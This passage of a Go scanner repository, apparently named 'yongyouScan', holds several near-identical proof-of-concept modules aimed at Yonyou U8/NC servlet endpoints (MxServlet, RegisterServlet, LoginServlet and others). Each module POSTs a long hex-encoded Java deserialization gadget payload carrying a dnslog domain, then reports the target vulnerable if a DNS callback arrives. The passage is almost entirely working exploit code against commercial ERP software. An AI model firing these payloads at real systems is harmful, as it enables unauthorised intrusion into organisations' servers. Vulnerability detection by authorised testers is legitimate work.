22 | 		SetHeaders(map[string]string{ // Set multiple headers at once
23 | 			"User-Agent":     UA,
24 | 			"Content-Length": "20434",
25 | 			"Content-Type":   "application/x-www-form-urlencoded",
26 | 		}).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", utils.InsertBackslashX(fmt.Sprintf("ACED0005737200146A6176612E7574696C2E4C696E6B65644C6973740C29535D4A6088220300007870770400000016737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017372000C6A6176612E6E65742E55524C962537361AFCE47203000749000868617368436F6465490004706F72744C0009617574686F726974797400124C6A6176612F6C616E672F537472696E673B4C000466696C6571007E00054C0004686F737471007E00054C000870726F746F636F6C71007E00054C000372656671007E00057870FFFFFFFFFFFFFFFF740014636333316F723332312E%s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url)
27 | 	if err != nil {
28 | 		color.Red.Println("[-] 用友 files 反序列化漏洞不存在")
29 | 		return
30 | 	}
31 | 	if dnslog.GetDnslogRecord(session) {
32 | 		color.Green.Println("[+] 用友 files 反序列化漏洞存在 -> " + url)
33 | 		return
34 | 	}
35 | 	color.Red.Println("[-] 用友 files 反序列化漏洞不存在")
36 | }
37 | 


--------------------------------------------------------------------------------
/pkg/POC/NC-Cloud-MxServlet/NC-Cloud-MxServlet.go:
--------------------------------------------------------------------------------
 1 | package u8_MxServlet
 2 | 
 3 | import (
 4 | 	"encoding/hex"
 5 | 	"fmt"
 6 | 	"github.com/gookit/color"
 7 | 	"github.com/imroc/req/v3"
 8 | 	"time"
 9 | 	"yongyouScan/pkg/dnslog"
10 | 	"yongyouScan/pkg/utils"
11 | )
12 | 
13 | var (
14 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
15 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
16 | )
17 | 
18 | func Run(url string) {
19 | 	domain, session := dnslog.GetDnslogUrl()
20 | 	url = url + "/servlet/~ic/nc.bs.framework.mx.MxServlet"
21 | 	_, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
22 | 		"User-Agent":     UA,
23 | 		"Content-Length": "20434",
24 | 		"Content-Type":   "application/x-www-form-urlencoded",
25 | 	}).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", utils.InsertBackslashX(fmt.Sprintf("ACED0005737200146A6176612E7574696C2E4C696E6B65644C6973740C29535D4A6088220300007870770400000016737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017372000C6A6176612E6E65742E55524C962537361AFCE47203000749000868617368436F6465490004706F72744C0009617574686F726974797400124C6A6176612F6C616E672F537472696E673B4C000466696C6571007E00054C0004686F737471007E00054C000870726F746F636F6C71007E00054C000372656671007E00057870FFFFFFFFFFFFFFFF740014636333316F723332312E%s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url)
26 | 	if err != nil {
27 | 		color.Red.Println("[-] 用友 U8 MxServlet反序列化漏洞不存在")
28 | 		return
29 | 	}
30 | 	if dnslog.GetDnslogRecord(session) {
31 | 		color.Green.Println("[+] 用友 U8 MxServlet反序列化漏洞存在 -> " + url)
32 | 		return
33 | 	}
34 | 	color.Red.Println("[-] 用友 U8 MxServlet反序列化漏洞不存在")
35 | }
36 | 


--------------------------------------------------------------------------------
/pkg/POC/U8-RegisterServlet/U8-RegisterServlet.go:
--------------------------------------------------------------------------------
 1 | package U8_RegisterServlet
 2 | 
 3 | import (
 4 | 	"encoding/hex"
 5 | 	"fmt"
 6 | 	"github.com/gookit/color"
 7 | 	"github.com/imroc/req/v3"
 8 | 	"time"
 9 | 	"yongyouScan/pkg/dnslog"
10 | 	"yongyouScan/pkg/utils"
11 | )
12 | 
13 | var (
14 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
15 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
16 | )
17 | 
18 | func Run(url string) {
19 | 	domain, session := dnslog.GetDnslogUrl()
20 | 	url = url + "/servlet/RegisterServlet"
21 | 	_, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
22 | 		"User-Agent":     UA,
23 | 		"Content-Length": "100",
24 | 		"Content-Type":   "application/x-www-form-urlencoded",
25 | 	}).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", utils.InsertBackslashX(fmt.Sprintf("ACED0005737200146A6176612E7574696C2E4C696E6B65644C6973740C29535D4A6088220300007870770400000016737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017372000C6A6176612E6E65742E55524C962537361AFCE47203000749000868617368436F6465490004706F72744C0009617574686F726974797400124C6A6176612F6C616E672F537472696E673B4C000466696C6571007E00054C0004686F737471007E00054C000870726F746F636F6C71007E00054C000372656671007E00057870FFFFFFFFFFFFFFFF740014636333316F723332312E%s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url)
26 | 	if err != nil {
27 | 		color.Red.Println("[-] 用友 U8 RegisterServlet反序列化漏洞不存在")
28 | 		return
29 | 	}
30 | 	if dnslog.GetDnslogRecord(session) {
31 | 		color.Green.Println("[+] 用友 U8 RegisterServlet反序列化漏洞存在 -> " + url)
32 | 		return
33 | 	}
34 | 	color.Red.Println("[-] 用友 U8 RegisterServlet反序列化漏洞不存在")
35 | }
36 | 


--------------------------------------------------------------------------------
/pkg/POC/u8-LoginServlet/u8-LoginServlet.go:
--------------------------------------------------------------------------------
 1 | package u8_LoginServlet
 2 | 
 3 | import (
 4 | 	"encoding/hex"
 5 | 	"fmt"
 6 | 	"github.com/gookit/color"
 7 | 	"github.com/imroc/req/v3"
 8 | 	"time"
 9 | 	"yongyouScan/pkg/dnslog"
10 | 	"yongyouScan/pkg/utils"
11 | )
12 | 
13 | var (
14 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
15 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
16 | )
17 | 
18 | func Run(url string) {
19 | 	domain, session := dnslog.GetDnslogUrl()
20 | 	url = url + "/servlet/~uap/nc.bs.sm.login.LoginServlet"
21 | 	_, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
22 | 		"User-Agent":     UA,
23 | 		"Content-Length": "43396",
24 | 		"Content-Type":   "application/x-www-form-urlencoded",
25 | 	}).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", utils.InsertBackslashX(fmt.Sprintf("ACED0005737200146A6176612E7574696C2E4C696E6B65644C6973740C29535D4A6088220300007870770400000016737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017372000C6A6176612E6E65742E55524C962537361AFCE47203000749000868617368436F6465490004706F72744C0009617574686F726974797400124C6A6176612F6C616E672F537472696E673B4C000466696C6571007E00054C0004686F737471007E00054C000870726F746F636F6C71007E00054C000372656671007E00057870FFFFFFFFFFFFFFFF740014636333316F723332312E%s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url)
26 | 	if err != nil {
27 | 		color.Red.Println("[-] 用友 U8 LoginServlet反序列化漏洞不存在")
28 | 		return
29 | 	}
30 | 	if dnslog.GetDnslogRecord(session) {
31 | 		color.Green.Println("[+] 用友 U8 LoginServlet反序列化漏洞存在 -> " + url)
32 | 		return
33 | 	}
34 | 	color.Red.Println("[-] 用友 U8 LoginServlet反序列化漏洞不存在")
35 | }
36 | 


--------------------------------------------------------------------------------
/pkg/POC/NC-XbrlPersistenceServlet/yonyou-NC-XbrlPersistenceServlet.go:
--------------------------------------------------------------------------------
 1 | package ERP_NC_MLBL
 2 | 
 3 | import (
 4 | 	"encoding/hex"
 5 | 	"fmt"
 6 | 	"github.com/gookit/color"
 7 | 	"github.com/imroc/req/v3"
 8 | 	"yongyouScan/pkg/dnslog"
 9 | 	"yongyouScan/pkg/utils"
10 | )
11 | 
12 | var (
13 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest()
